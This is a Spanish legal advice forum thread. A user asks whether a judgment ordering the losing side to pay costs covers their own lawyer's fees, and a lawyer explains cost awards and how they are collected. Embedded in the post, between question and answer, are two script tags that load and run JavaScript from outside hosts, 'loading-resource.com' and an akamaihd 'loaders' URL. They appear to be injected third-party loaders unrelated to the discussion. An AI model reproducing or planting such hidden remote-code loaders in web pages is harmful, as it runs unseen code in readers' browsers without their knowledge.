¿Quién paga los honorarios de mi abogado, si ganamos el pleito?

Hola:os quería preguntar ,si en la sentencia pone que la parte contraria está condenada a pagar las costas de juicio,esto significa que pagan los gastos de los honorarios de mi abogado?....O mi abogado tiene que cobrar por las dos partes<<<<<' una por medio de la sentencia favorable a nosotros y otra por mi parte,con el porcentaje que habíamos acordado en caso de ganar.un saludo y muchas gracias.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta

1
Respuesta de

Hola.

Se parte de la base de que cada cliente, salvo pactos particulares, abona a sus respectivos abogados y procuradores sus honorarios.

Posteriormente y con la sentencia, condena en costas significa que la parte vencida en litigio habrá de abonar no sólo los honorarios de su representación, sino también los de la representación del vencedor.

Para efectuar el cobro, su abogado se comunicaría con el letrado contrario procurando un pago amistoso de las costas. De no haber conformidad, su abogado deberá instar un nuevo procedimiento ante el Secretario Judicial denominado "Tasación de Costas". En él, su abogado y procurador presentarían sus minutas de honorarios y la Hoja de Encargo (acuerdo escrito entre usted y el letrado) pudiendo la otra parte mostrar su conformidad o impugnarlos. La cuestión se resolverá por el Secretario mediante Decreto.

Posteriormente, una vez cobradas las costas, lo normal es que a usted se le devuelvan los gastos efectuados hasta el momento, pero todo dependerá del acuerdo al que llegara con su abogado y de los honorarios devengados (debidos) y aún no abonados por usted (si los hubiera, claro está).

Un saludo.

AVISO: estos consejos son meramente orientativos y limitados. Las consultas pueden adolecer de falta de detalles trascendentales. No se han examinado documentos ni atendido personalmente. Si fuera necesario, póngase en contacto con un abogado de su entorno más cercano. Confíe en los abogados.

Añade un comentario a esta respuesta
Añade tu respuesta
Haz clic para o
Escribe tu mensaje